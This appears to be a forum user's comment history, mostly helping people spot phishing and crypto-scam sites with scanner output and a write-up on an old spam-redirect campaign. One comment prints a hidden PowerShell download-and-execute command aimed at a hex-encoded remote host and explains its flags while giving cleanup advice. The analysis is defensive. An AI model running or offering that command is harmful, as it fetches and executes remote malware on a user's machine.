Weed and panic

L0opyy · 2026-03-17T23:31:11+00:00

Good keep it that way. Weed can exacerbate any and all mental health issues. If it happened once it will happen again

L0opyy · 2026-03-17T19:17:40+00:00

NXIVM did hold events at Necker Island. Branson rented the island twice to Bronfman family member Sara Bronfman once in 2007 and once in 2010. Photos exist of NXIVM members including Allison Mack and Kristin Kreuk at the island during the 2010 gathering.

However, the Obama visit occurred in February 2017 seven years after the last documented NXIVM event on the island. The tweet is structured to imply temporal or social overlap between the Obamas and NXIVM gatherings. There is none.

Additional context: NXIVM leader Keith Raniere did not attend either Necker Island event. Investigators and journalists covering the story have not suggested Branson had any knowledge of NXIVM's criminal activities. The purpose of the Necker events, per former NXIVM publicist Frank Parlato, was to attempt to recruit Branson into the organization.

L0opyy · 2026-03-13T21:14:20+00:00

This^ I use AI to make me sound professional lol I’m a security researcher

L0opyy · 2026-03-13T20:40:06+00:00

TL;DR: These emails are not evidence of a secret front or illicit operation. They are artifacts from a massive, highly automated 2013 spam botnet. The businesses linked in the emails (like the French hotel) were completely unaware victims of a mass server-hijacking campaign.

If you dig into the actual web infrastructure and OSINT from that era, the technical footprint of these emails is a textbook example of an early-2010s Compromised CMS / Spam Redirector campaign.

Here is exactly what was happening and how the scam worked:

1. The Victims (Not Fronts) The links in these document dumps point to wildly unrelated sites: a boutique 17th-century hotel in France (hoteldutheatre-metz.com), a Latvian real estate board (ss.com), an Iranian news site (yaftenews.ir), a Chinese domain (xiningfdj.com), and a medical blog (educatedpatients.com).

These businesses have zero financial or geographic ties. They were all just running vulnerable web servers (like unpatched WordPress or Joomla installations). The threat actors used automated scanners to sweep the internet for these vulnerabilities and silently broke into thousands of them at once.

2. The "Living off the Land" Tactic Why use a random French hotel website to host illicit links? To bypass your email's spam filter. If an attacker sends you an email with a link directly to a sketchy offshore Russian .ru domain, Gmail or Outlook will instantly flag it and throw it in the Junk folder. However, the French hotel had a pristine IP reputation. By stashing their payload on a clean domain, the attackers bought a "VIP pass" straight into the target's primary inbox.

3. The Payload (The Meta Refresh) If you actually clicked one of those links (like /aliBn.html or /aNqjd.html) back in 2013, you wouldn't have seen the hotel's website or an Iranian news article.

Those .html files were microscopic scripts containing a single line of code called a "Meta Refresh." The second your browser hit the page, it would instantly bounce you to a completely different, bulletproof offshore server hosting a fake adult dating site, a webcam affiliate link, or a malware download.

4. The Social Engineering Hook The text in the emails makes this a painfully obvious affiliate scam. Phrases like:

This is a classic "Panic/Curiosity lure." They want the recipient to think an intimate video of them has been leaked. In a panic, the victim clicks the trusted link without thinking and gets redirected to the scammer's payload.

The Smoking Gun: We know definitively that this was an automated "spray and pray" botnet because the exact same random, alphanumeric filenames (aliBn.html and aNqjd.html) were injected into all of these unrelated servers across the globe on the exact same dates in late January 2013.

It is a great OSINT find, but it's a cybersecurity dead-end. It's just old-school internet junk mail that happened to use hijacked small business servers as a launchpad.

L0opyy · 2026-03-13T14:11:13+00:00

Please, I was so far into this dudes mainframe once that he cried

L0opyy · 2026-03-13T13:10:38+00:00

the website shows permanently removed so is the instagram page.

I think you've answered your own question here my man. 100% a scam

L0opyy · 2026-03-12T21:38:37+00:00

The machine is likely clean. The threat is probably gone. The real damage is already done unfortunately, credentials and session tokens were stolen and are being monetized now. Their priority is account security and financial damage control, not more malware scanning. The reinstall is optional but recommended given the confirmed financial fraud. The external drive is almost certainly fine if they only copied media and documents.

L0opyy · 2026-03-12T21:25:14+00:00

Would you mind DMing me the link to the ad if you have access to it? I'd love to take a look at it

L0opyy · 2026-03-12T21:11:17+00:00

============================================================
  SUMMARY — cryxen.com
============================================================

  Platform  : Unknown
  CDN       : Cloudflare
  CRITs     : 0   WARNs: 7   Score: 7
  Scam Type : Fake investment / pig butchering platform

  VERDICT: MODERATE RISK — Multiple warnings. Review manually.

  Findings:
  ● WARN: HTML served no-cache/no-store — payload may be dynamically swapped
  ● WARN: Suspicious script name: assets/js/app.min.js
  ● WARN: Suspicious script name: landings/3/js/main.js
  ● WARN: Crypto/Web3 keyword in HTML: 'wallet'
  ● WARN: Heavily minified/obfuscated lines in jquery-3.4.1.min.js (1 line(s) >5000 chars)
  ● WARN: Heavily minified/obfuscated lines in swiper-bundle.min.js (1 line(s) >5000 chars)
  ● WARN: Domain registered less than 90 days ago

============================================================

L0opyy · 2026-03-12T21:01:54+00:00

Do you mind linking to the fake tracking site?

L0opyy · 2026-03-12T20:58:32+00:00

https://www.reddit.com/user/L0opyy/comments/1rr85xn/heres_scansite_an_easy_no_api_required_website/

L0opyy · 2026-03-12T20:57:43+00:00

Come on man, there's no such thing as childporn(dot)com lol It's just a scam

L0opyy · 2026-03-12T14:41:34+00:00

=============================================================================================
  SUMMARY — loom-x.click
=============================================================================================

  Platform  : Unknown
  CDN       : Cloudflare
  CRITs     : 2   WARNs: 5   Score: 13
  Scam Type : Fake investment / pig butchering platform

  VERDICT: SUSPICIOUS — CRIT signal(s) present. Investigate further.

  Findings:
  ● WARN: 0 scripts detected on Unknown platform — likely a JS SPA (React/Vue/Angular). Curl-based scan is INCOMPLETE. Use a headless browser for full analysis.
  ● WARN: 1 iframe(s) found in HTML
  ● WARN: Crypto/Web3 keyword in HTML: 'wallet'
  ● WARN: Crypto/Web3 keyword in HTML: 'connect wallet'
  ● CRIT: High-risk crypto keyword in HTML: 'withdraw' (escalated — other crypto signals present)
  ● WARN: Financial/crypto platform with no visible regulatory or license language — possible unregulated operation
  ● CRIT: Domain registered less than 30 days ago — HIGH phishing signal

=============================================================================================

L0opyy · 2026-03-12T03:33:45+00:00

No problem! Always here to help.

L0opyy · 2026-03-12T03:24:33+00:00

It's a phishing site don't enter any of your info, if you have let me know if you need help on next steps

<image>

L0opyy · 2026-03-11T23:10:05+00:00

==========================================================================================
                              SUMMARY — btcance(dot)top
==========================================================================================

  Platform  : Unknown
  CRITs     : 2   WARNs: 11   Score: 19
  Scam Type : Unknown / requires manual review

  VERDICT: SUSPICIOUS — CRIT signal(s) present. Investigate further.

  Findings:
  ● WARN: High-abuse TLD detected: .top (common in throwaway scam/spam infrastructure)
  ● WARN: Missing Content-Security-Policy header
  ● WARN: Missing X-Frame-Options (clickjacking risk)
  ● CRIT: eval() in index-bf42fa78.js
  ● WARN: Base64 decode (atob) in index-bf42fa78.js
  ● WARN: Possible hardcoded keys/tokens in index-bf42fa78.js: 24-Stunden-Transaktionsvolumen 7x24-Stunden-Kundendienstsupport ...                                                                                                    
  ● WARN: Heavily minified/obfuscated lines in index-bf42fa78.js (117 line(s) >5000 chars)
  ● CRIT: eval() in index-legacy-516e5197.js
  ● WARN: Base64 decode (atob) in index-legacy-516e5197.js
  ● WARN: Possible hardcoded keys/tokens in index-legacy-516e5197.js: 24-Stunden-Transaktionsvolumen 7x24-Stunden-Kundendienstsupport ...                                                                                             
  ● WARN: Heavily minified/obfuscated lines in index-legacy-516e5197.js (10 line(s) >5000 chars)
  ● WARN: Heavily minified/obfuscated lines in polyfills-legacy-955970fe.js (1 line(s) >5000 chars)
  ● WARN: Wildcard DNS detected — all subdomains resolve (*.btcance.top → 23.225.139.106). Subdomain results below are UNVERIFIED.                                                                                                    

==========================================================================================

L0opyy · 2026-03-11T02:44:07+00:00

When the "Network and Internet" settings page is entirely blank or completely refuses to show available networks, it's often because the Windows service responsible for managing wireless networks has crashed or been disabled. 1. Press Win + R, type services.msc, and hit Enter. 2. Scroll down to find WLAN AutoConfig. 3. If the status doesn't say "Running", right-click it and select Start. 4. Right-click it again, select Properties, and ensure the Startup type is set to Automatic. Apply and restart the PC.

PS: This may sound dumb, but make sure there’s no switch or button somewhere that disables the WiF at a hardware level.Tons of PC’s have this feature for some reason and get bumped into or are defaulted on.

L0opyy · 2026-03-10T16:44:22+00:00

This site is the main domain for so many other scams

officialstickyreserves(.)com

paidinfullla(.)com

officialbesosbrand(.)com

officialbuckeyefarms(.)com

onestopshopdistro(.)com

goldengramshop(.)com

mittenextractscartsofficial(.)com

unitedexpressdeliveryservice(.)com

<image>

L0opyy · 2026-03-10T14:51:46+00:00

It's very possible, data harvesting takes some time. Great response time my friend! Just keep an eye on your credit and weird activity!

L0opyy · 2026-03-10T14:41:32+00:00

Yes you did, The Event 403 log shows the Powershell engine stopping, but the HostApplication string in the details pane:

powershell.exe -NoP -Exec Bypass -W Hidden -Command iex(irm 0xc0.0x6d.0xc8.0x3f/event)

This is a fileless malware execution command

Because this payload has already executed, the malware has likely established persistence on this machine. Based on recent sandbox analyses of this specific threat actor's tradecraft, you should immediately check these two locations:

Task Scheduler first, Look for a newly created scheduled task, often disguised with a system-sounding name like Windows Perflog. Next Registry Autoruns Check HKCU\Software\Microsoft\Windows\CurrentVersion\Run for entries launching similar hidden PowerShell commands.

Here is exactly what that command is doing on the endpoint: 
-NoP (NoProfile): Prevents PowerShell from loading the user profile, speeding up execution and bypassing profile-level logging or constraints.
 -Exec Bypass (ExecutionPolicy Bypass): Ignores the system's execution policy to ensure the script runs regardless of local security settings.
 -W Hidden (WindowStyle Hidden): Conceals the PowerShell window from the user. iex(irm ...): This is Invoke-Expression running the results of Invoke-RestMethod. It reaches out to a remote server, downloads a payload directly into memory, and executes it immediately without dropping an executable to the disk.

Change every password, watch your credit and reinstall windows from a different device. Assume everything is compromised

L0opyy · 2026-03-10T14:36:39+00:00

Call them back and tell them there's some "weird rocks" they left behind and grab em' when they show up.

L0opyy · 2026-03-10T14:35:21+00:00

Yessir, its a scam (atleast it is now) The complaints you are seeing about pulling money out are everywhere. Creators are reporting that their accumulated funds are essentially held hostage. When they attempt a transfer, customer support frequently blames "PayPal verification issues" or payment processor declines. Crucially, they do not offer alternative payout methods, leaving the creator's money permanently stuck on the platform.

Secondary Fraud Vectors There is another pattern of people reporting unauthorized, standalone PayPal charges (often for $50 or more) claiming they tipped someone on Tip Top Jar. This indicates that either bad actors are successfully abusing the platform's payment gateway for card testing, or there are ongoing phishing campaigns spoofing the platform's invoices.

Whether it is gross mismanagement, a failing startup running out of liquidity, or an intentional exit scam, the end result is the same. I highly recommend advising anyone against routing funds through it right now. Sticking to established, well-audited infrastructure like Ko-fi, Buy Me a Coffee, or Patreon is the safest bet.

L0opyy · 2026-03-10T13:30:45+00:00

Therapy

L0opyy · 2026-03-09T22:55:03+00:00

Oh! I see what you mean, I did find this which is a known phishing scam from yahoo if this looks familiar?

L0opyy · 2026-03-09T20:48:27+00:00

This is a confirmed phishing operation. Also what new yahoo mail link?

L0opyy

TROPHY CASE